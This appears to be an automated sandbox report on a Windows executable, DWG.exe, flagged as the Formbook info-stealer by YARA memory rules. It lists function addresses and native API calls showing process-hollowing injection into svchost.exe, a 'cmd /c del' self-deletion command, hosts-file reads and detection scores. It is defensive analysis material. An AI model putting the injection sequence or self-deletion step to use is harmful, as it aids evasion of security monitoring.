Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00457B08
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00424075
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00423006
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00423204
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00425326
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_004234B8
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00443530
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00445718
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_004238CF
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00439891
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_004249F1
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00423A87
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00423C50
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0043ED67
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00425D9C
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00421E34
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00426F68
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00427F39
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00401030
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_0041C9C9
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_0041C98E
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_0041BA57
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00401208
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00408C80
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00402D90
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_0041CFA3
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00402FB0
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AA20A0
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B420A8
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A8B090
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B428EC
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B4E824
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A9A830
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B31002
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A94120
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A7F900
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B422AE
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B2FA2B
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AAEBB0
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B223E3
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B3DBD2
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B303DA
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AAABD8
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B42B28
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A9AB40
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A8841F
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B3D466
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AA2581
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A8D5E0
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B425DD
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A70D20
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B42D07
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B41D55
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B42EF7
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00A96E30
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B3D616
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B41FF1
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00B4DFCE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037CCB4F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374AB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037F2B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A309
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037D23E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E03DA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037EDBD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0375ABD8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0375EBB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0375138B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B236
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037DFA2B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037F22AE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03744120
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0372F900
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037499BF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A830
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037FE824
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E1002
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037F28EC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037520A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037F20A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0373B090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037F1FF1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037FDFCE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03746E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037ED616
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037F2EF7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037F1D55
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03720D20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037F2D07
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0373D5E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037F25DD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03752581
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E2D82
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B477
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037ED466
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0373841F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4496
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F2C9C9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F2C98E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F12FB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F2CFA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F18C80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F12D90
Source: C:\Users\user\Desktop\DWG.exe | Code function: String function: 0043691C appears 124 times
Source: C:\Users\user\Desktop\DWG.exe | Code function: String function: 00A7B150 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B150 appears 136 times
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00457368 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0045B4DD NtTerminateProcess
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_004574D8 NtCreateFile
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0045D728 NtCreateFile,NtCreateSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0045D928 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_004579E8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00458A28 NtWriteFile,NtCreateSection,NtClose
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00457B08 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtGetContextThread,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00458097 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0045838A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_004185E0 NtCreateFile
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00418690 NtReadFile
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00418710 NtClose
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_004187C0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_0041883A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_004185DA NtCreateFile
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00418632 NtCreateFile
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_0041868C NtReadFile
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_0041870B NtClose
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB95D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9820 NtEnumerateKey
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00ABB040 NtSuspendThread
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB99D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9950 NtQueueApcThread
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9A10 NtQuerySection
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00ABA3B0 NtGetContextThread
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9B00 NtSetValueKey
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB95F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00ABAD30 NtSetContextThread
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9560 NtWriteFile
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB96D0 NtCreateKey
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9650 NtQueryValueKey
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00ABA710 NtOpenProcessToken
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9760 NtOpenProcess
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00AB9770 NtSetInformationFile
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00ABA770 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037699A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037696E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037696D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037695D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769B00 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0376A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769A20 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769A10 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769950 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037699D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0376B040 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769820 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037698F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037698A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0376A770 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769770 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769760 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0376A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037697A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769560 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0376AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03769520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037695F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F28690 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F287C0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F28710 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F285E0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F2883A NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F2868C NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F28632 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F2870B NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_02F285DA NtCreateFile
Source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamesvchost.exej% vs DWG.exe
Source: DWG.exe, 00000005.00000002.379687984.0000000000B6F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DWG.exe
Source: DWG.exe | Virustotal: Detection: 50%
Source: DWG.exe | ReversingLabs: Detection: 37%
Source: DWG.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DWG.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\DWG.exe 'C:\Users\user\Desktop\DWG.exe'
Source: C:\Users\user\Desktop\DWG.exe | Process created: C:\Users\user\Desktop\DWG.exe C:\Users\user\Desktop\DWG.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DWG.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DWG.exe | Process created: C:\Users\user\Desktop\DWG.exe C:\Users\user\Desktop\DWG.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DWG.exe'
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: C:\Users\user\Desktop\DWG.exe | File created: C:\Users\user\AppData\Local\Temp\Cielert.tmp
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/0@10/4
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00401593 GetDiskFreeSpaceExA
Source: DWG.exe | Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_01
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00448223 FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: DWG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: DWG.exe, 00000005.00000002.379687984.0000000000B6F000.00000040.00000001.sdmp, svchost.exe, 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
